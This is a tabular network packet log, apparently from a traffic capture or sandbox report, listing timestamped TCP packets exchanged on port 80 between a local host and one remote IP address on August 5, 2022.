Aug 5, 2022 13:54:19.574280024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574314117 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574348927 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574383020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574384928 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574417114 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574426889 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574430943 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574455023 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574467897 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574489117 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574507952 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574525118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574542999 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574561119 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574579000 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574594975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574610949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574631929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574645042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574667931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574682951 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574703932 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574739933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574755907 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574774981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574775934 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574805021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574812889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574826956 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574848890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574876070 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574883938 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574898005 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574922085 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574932098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574956894 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.574971914 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.574992895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.575002909 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.575045109 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586358070 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586441040 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586486101 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586525917 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586566925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586568117 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586599112 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586607933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586636066 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586652994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586674929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586697102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586699963 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586736917 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586740017 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586779118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586780071 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586819887 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586819887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586860895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586868048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586903095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586905003 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586946011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586945057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.586986065 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.586987972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587028980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587032080 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587071896 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587076902 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587111950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587116957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587157965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587160110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587201118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587201118 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587239981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587243080 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587282896 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587284088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587325096 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587326050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587393045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587404013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587447882 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587455988 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587487936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587488890 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587527037 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587528944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587568045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587569952 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587611914 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587611914 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587654114 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587656021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587694883 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587697029 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587732077 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587737083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587779045 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587783098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587817907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587817907 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587857008 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587858915 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587898016 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587899923 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587939978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587939978 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.587980032 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.587985039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.588022947 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.588025093 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.588063955 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.588063955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.588104963 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.588108063 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.588146925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.588150978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.588186979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.588187933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.588227034 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.588228941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.588268995 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.588270903 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.588309050 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.594760895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.594819069 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.594858885 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.594904900 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.594928980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.594948053 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.594963074 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.594990015 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.594996929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595031977 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595031977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595074892 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595077038 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595114946 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595118999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595159054 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595160961 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595201969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595206022 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595246077 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595247030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595288992 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595289946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595331907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595331907 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595371962 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595407009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595448017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595457077 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595489025 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595491886 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595529079 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595531940 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595567942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595570087 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595609903 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595612049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595653057 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595653057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595695019 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595695972 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595747948 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595751047 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595789909 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595789909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595832109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595849991 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595870972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595896006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595911026 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595938921 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595952988 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.595964909 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.595993042 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.596018076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.596033096 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.596040964 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.596074104 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.596087933 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.596138954 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604238987 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604305029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604347944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604393005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604423046 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604435921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604466915 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604476929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604501009 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604518890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604545116 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604561090 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604587078 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604599953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604610920 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604641914 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604655981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604681969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604708910 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604722977 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604722977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604764938 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604765892 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604804993 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604806900 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604845047 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604846001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604885101 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604886055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604926109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.604928017 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604968071 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.604968071 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.605007887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.605010986 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.605048895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.605071068 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.605094910 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.605098963 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.605134964 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.605324030 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.617510080 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617566109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617609024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617649078 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617690086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617700100 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.617733002 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.617733955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617749929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.617775917 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617805958 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.617816925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617835999 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.617858887 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617861032 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.617898941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617902040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.617940903 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.617942095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617985010 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.617985010 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618026018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618027925 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618067980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618067980 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618110895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618110895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618154049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618154049 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618196011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618197918 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618237019 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618238926 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618280888 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618283033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618323088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618325949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618365049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618364096 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618407965 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618407965 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618448019 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618458986 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618488073 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618489027 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618530035 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618534088 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618567944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618578911 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618608952 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618609905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618650913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618654966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618691921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618696928 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618733883 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618736982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618773937 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618776083 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618814945 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618818998 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618856907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618859053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618896008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618900061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618937016 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618937969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.618979931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.618985891 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.619021893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.619028091 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.619064093 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.619066954 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.619107008 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.619106054 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.619148970 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.619154930 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.619189978 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.619193077 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.619230032 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.619230986 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.619271994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.619276047 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.619313955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.619318008 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.619375944 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.619381905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.619440079 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.625499964 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625559092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625600100 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625643969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625686884 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625725031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625735998 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.625757933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625778913 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.625801086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625825882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.625844955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625864983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:19.625888109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:19.625907898 CEST	49778	80	192.168.2.4	51.195.166.178
